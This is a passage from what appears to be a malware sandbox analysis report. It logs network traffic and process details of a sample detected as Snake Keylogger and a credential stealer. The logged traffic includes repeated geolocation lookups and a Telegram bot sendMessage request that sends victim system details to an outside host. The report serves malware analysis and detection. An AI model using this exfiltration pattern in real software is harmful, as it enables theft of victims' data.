2025-01-03 08:21:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49823	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:26 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:26 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207275 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SQSHzlKaCMoQuP4QNJPumGC0AXT4XAc0%2FBoCPY5O1nbG0lMVHFI2dkn%2Fh%2F8sz1sYfiO5EOSoHZt6R7Tz6lIfYoHliVR2kIoiVTsZTHxG0CEnECPqhpFoxGWVnsRD3kT9fBAJbDus"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc1934799c1728a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1976&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457085&cwnd=227&unsent_bytes=0&cid=6d50fe6861654bfe&ts=149&x=0"
2025-01-03 08:21:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49833	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:27 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207276 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BeCY2VQ8EkNxVXlwYai1tcx%2FVMC9R%2BHRMdFphK8c54yx0B3K8S0u15uG6RWLpSbSFrm4a1gTWmxMDg8KsUT6IvjMBupaEXK3QT7SHS672RbYsKkATdcmXkj%2FXXA5jNZo7nuNNXB4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc193501cf3c334-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1454&rtt_var=559&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1932495&cwnd=247&unsent_bytes=0&cid=104b9e8a246b63d2&ts=153&x=0"
2025-01-03 08:21:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49844	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-03 08:21:29 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207278 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1j5evo8weGRkI%2Bj%2FMbsxTmFiRxbbRoSmWNrjsWA%2FiUjLWL3zLEiWQAZ9iEXFVfumLezilk2Qs76pO%2FV509jW%2BfY50UX3xPWbC469DKQWwUpqN%2FCd9G6jEm5snjTQu1uEBz2XFws2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc193586e1a42b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2458&min_rtt=2455&rtt_var=927&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1176470&cwnd=237&unsent_bytes=0&cid=6c2f4136ac3f57b4&ts=150&x=0"
2025-01-03 08:21:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49853	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:30 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:30 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207279 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lbsEq47YNlzlk6LkmBaBOMKiUsKZHbBZac6eCaAivCysHH4QvOW59iyy7jgG9Q6tjWlkXm6oTXi1WRuUqYtkaoMrw%2BUS7%2Bv%2FGHUFsni%2FvB8Pse%2F2zRuOXLZiPez5HFKgHUWkBOw%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc19360a9cd4211-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1737&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1681059&cwnd=239&unsent_bytes=0&cid=5ba88531a1924fda&ts=153&x=0"
2025-01-03 08:21:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49862	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-03 08:21:31 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207280 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9W3jBwyLSreYBcslOpLYRqP3oYOlHUBTaVtRma5V9ILn6NPddACtfqVu9kJVQwV3PVKO8SgQ0OkOYVHNmcKwQsQkYTs4yZfoZrihhUuYB2T%2Bw7ToGaWYmVD7GohyUq8yPoDmQglt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc19369c800c354-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1479&rtt_var=564&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1923583&cwnd=178&unsent_bytes=0&cid=5b1ba5bf1e3dc9b6&ts=144&x=0"
2025-01-03 08:21:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49874	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:33 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:33 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207282 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNtEtNIm7hjVWAUxeZ4Td0Yqpt%2FCm1ZGZbFC7lkk2m5MSbyAnr2CETkbEpA5oEdDQHHjwE49AknHqAAWNiLfd2lUb4ok4TM4wuW4nPmK%2B%2FJ4LKAISVEJTIhzzjiZ2awWdN2Mc%2F11"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc19371fc2f6a58-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1657&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1699650&cwnd=235&unsent_bytes=0&cid=2c6bc9e3e608b1da&ts=155&x=0"
2025-01-03 08:21:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49884	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-03 08:21:34 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207283 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOWlOHKC8Il6J%2Bzqns3%2FAow5YYD8Dr5sL0aBuizuy0TmVOwub6yHwMtkMJXHKJaOIAu0xXx3qmHUseI3GcduUhnFVyvbMjztCZs7NPAtAsUeSyxSf%2FbmIS5PGQtxC3JZuC4Zn2%2Bj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc1937a1f030f98-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1456&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1863433&cwnd=182&unsent_bytes=0&cid=54511f4f798edcfe&ts=149&x=0"
2025-01-03 08:21:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49893	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-03 08:21:35 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207284 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vj%2F9Rf%2B5x4FkwEeOPRQfc%2Bj%2B4W1A7Jid8scQHERZiAjdU7F9TgZmoJ4UFNbnAKHM%2BzDpQEfi25sX3ehujLr4yrp6J4ZUn8sUKebOtRui8BDoLU4u%2FQSCuVeB5rfSg3iQIsAd3YLZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc193824b4741d8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1702&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1676234&cwnd=222&unsent_bytes=0&cid=d5ad46cb559e599e&ts=157&x=0"
2025-01-03 08:21:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49899	149.154.167.220	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:36 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:16:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-03 08:21:36 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 03 Jan 2025 08:21:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-03 08:21:36 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	3
Start time:	03:21:05
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\FACT0987789000900.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACT0987789000900.exe"
Imagebase:	0x490000
File size:	641'024 bytes
MD5 hash:	E4DA22458C317595E4BD6712B4728D36
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:21:06
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\thixolabile\juvenile.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACT0987789000900.exe"
Imagebase:	0x8d0000
File size:	641'024 bytes
MD5 hash:	E4DA22458C317595E4BD6712B4728D36
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.1322250001.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:21:09
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACT0987789000900.exe"
Imagebase:	0x6f0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential 